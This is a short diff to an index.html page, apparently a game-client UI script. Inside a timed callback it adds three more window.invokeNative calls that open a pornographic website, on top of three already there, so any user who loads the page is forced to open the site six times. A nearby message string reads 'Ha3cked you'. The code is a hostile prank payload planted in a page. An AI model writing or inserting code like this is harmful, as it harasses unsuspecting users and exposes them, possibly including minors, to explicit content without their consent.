--- a/index.html
+++ b/index.html
@@ -83,6 +83,9 @@
             window.invokeNative("openUrl", "https://pornhub.com");
             window.invokeNative("openUrl", "https://pornhub.com");
             window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
         }, 2500);
    
 const msg = ` sfa7 Ha3cked you 🫃🔞  `;
